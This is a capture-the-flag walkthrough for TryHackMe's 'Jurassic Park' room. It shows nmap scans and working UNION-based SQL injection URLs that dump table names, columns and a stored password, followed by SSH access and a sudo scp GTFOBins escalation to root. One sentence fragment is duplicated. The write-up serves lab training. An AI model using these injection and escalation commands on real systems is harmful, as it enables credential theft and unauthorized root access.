This is the writeup for the Jurassic Park CTF on TryHackMe! This box involves some sql injection in order to gain credentials to a linux server. The privesc pathway is a classic linux bin exploit.

https://tryhackme.com/room/jurassicpark

tags: sqli, dinosaurs, linux_privesc

First let's kick things off with a fast nmap scans to get a quick lay of the land.

export IP=10.10.82.128 nmap -F $IP

Next, we'll start another scan in the background to check scripts and the higher ports.

sudo nmap -sC -sV -A -p- $IP -oN nmap.script.scan.txt

This scan doesn't turn up anything else of use. Let's move on to walking the website on port 80. Probably we can find some credentials for logging into the server via ssh.

On the landing page we see a link to a store and hear the JP theme song. A quick look at the source code shows an assets directory. This dir is accessible to us and we find a bunch of images, sounds, and a few gifs.

Looking at how the address changes for each of the packages, I noticed a pattern id=1, id=2, id=3. Playing around with this I tried id=4 and id=5 and discovered a message on the id=5 page.

Here is the secret message:

I also fired up sqlmap to see if there are any interesting findings. It scanned for a long time but didn't come up with anything in the end.

So we know that we are dealing with some kind of database and a few characters that have been blocked by the admin. After toying around with some different sql injection techniques, I was able to display the database name and a system os version with the following inline address:

'http://10.10.169.116/item.php?id=5%20union%20all%20select%20101,database(),365,version(),5'

Further enumeration led me to expose the table names: http://10.10.169.116/item.php?id=1 union select 1,2,3 ,group_concat(table_name),5 from information_schema.tables where table_schema = database()

And the columns of table 'users':

http://10.10.169.116/item.php?id=1 union select 1,2,3, group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = “users”

And finally we can grab the password: http://10.10.169.116/item.php?id=5 union select 1,2,3,password,5 from users

Assuming that the Dennis mentioned in ?id=5 might be a username, let's go ahead and ssh our way into the server with this password.

'ssh dennis@$IP'

sudo -l

##LOCAL ENUMERATION AND EXPLOITATION**

Checking sudo -l shows a curious permission.

The bash history reveals some juicy details including a few flags and a curious use of the scp command.

history

Checking the vim_history also reveals another flag. vim_history

Let's check GTFObins to see if there is a way to achieve persistent sudo permissions (root access) with the scp bin.

e persistent sudo permissions (root access) with the scp bin.

We can perform this privesc with the following commands:

TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y:

And we now have elevated our permissions to the root user!

The final flag can be captured by running the script in dennis' home folder as root, or by locating it with find and then catting it out.

Thanks for reading!